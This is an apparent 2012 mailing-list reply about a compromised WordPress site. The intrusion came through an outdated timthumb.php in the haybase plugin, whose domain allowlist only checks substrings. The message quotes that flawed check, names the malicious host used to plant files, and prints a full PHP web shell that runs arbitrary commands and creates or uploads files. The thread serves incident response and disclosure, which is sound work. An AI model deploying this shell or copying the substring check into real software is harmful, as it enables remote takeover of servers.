Hi Holger,
Op 23-8-2012 18:45, Holger Motzkau schreef:
Hej!
Our installation and our plugins are all up to date.
The problem is the haybase-plugin which we installed to use the blue
Dutch WLM skin. It contains a file called timthumb.php with the
following code:
https://github.com/hay/haybase/blob/master/src/timthumb.php seems
to be
older than
http://timthumb.googlecode.com/svn/trunk/timthumb.php
Code part seems to be changed
// external domains that are allowed to be displayed on your website
$allowedSites = array (
'flickr.com',
'picasa.com',
'blogger.com',
'wordpress.com',
'img.youtube.com',
'upload.wikimedia.org',
);
[...]
foreach ($allowedSites as $site) {
if (strpos (strtolower ($url_info['host']), $site) !== false) {
$isAllowedSite = true;
}
}
And the check there is stupid. It just checks if an external url
contains
flickr.com, not if the url is actually
flickr.com. Using
this, manipulated gif images were downloaded from
http://flickr.com.aseana.com.my/xc0de.php and ended up in the cache
folder for scaled images where it later was executed as php files.
More readable
code, in short: you can execute commands on the server.
<?php
@error_reporting(0);
@set_time_limit(0);
$bogel = $_GET['bogel'];
$osc = $_GET['osc'];
if (isset($bogel)) {
eval(
echo "bogel<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo reload-x";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
); die; }
elseif (isset($osc)) {
eval(
$cmd=base64_decode($osc);
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}); }
else { eval(
$content = stripslashes($_POST['content']); $cfile = $_POST['cfile'];
$ufile = $_POST['ufile'];
echo '<br>'.php_uname().'<br>';
echo '<form action="" method="post"
enctype="multipart/form-data"
name="aw" id="aw">';
echo '<textarea name=content
style="width:585px;height:200px">'.$content.'</textarea><br>';
echo '<input type="text" name="cfile" size="10"
value="bogel.php">';
echo '<input name="_create" type="submit" id="_upl"
value="Create">';
echo '<input type="file" name="file"
size="30"><input type="text"
name="ufile" size="10" value="antisux.php">';
echo '<input name="_upload" type="submit" id="_upl"
value="Upload"></form>';
if($_POST['_create']){
$handle = fopen($cfile, 'w');
if($handle){
if (fwrite($handle, $content) === FALSE) { echo "Create $cfile
GAGAL<br>"; }
else { echo "Create $cfile SUKSES !!!<br>"; } fclose($handle);
} else { echo 'Create File GAGAL<br><br>'; }
}
if($_POST['_upload']){
if(@copy($_FILES['file']['tmp_name'], $ufile)) { echo "Upload
$ufile SUKSES !!!<br><br>"; }
else { echo "Upload $ufile GAGAL !!!<br><br>"; }
}
); }
?>
It seems only the index.php was replaced and another
text file was added.
Is your accesslog still available? You can hunt down the
ip's used and
what commands were executed
As we switched to Elyas red skin last weekend I just
removed the old
WMNL skin and the haybase plugin.
I would suggest everyone still using that plugin
should switch to the
newer one.
Maarten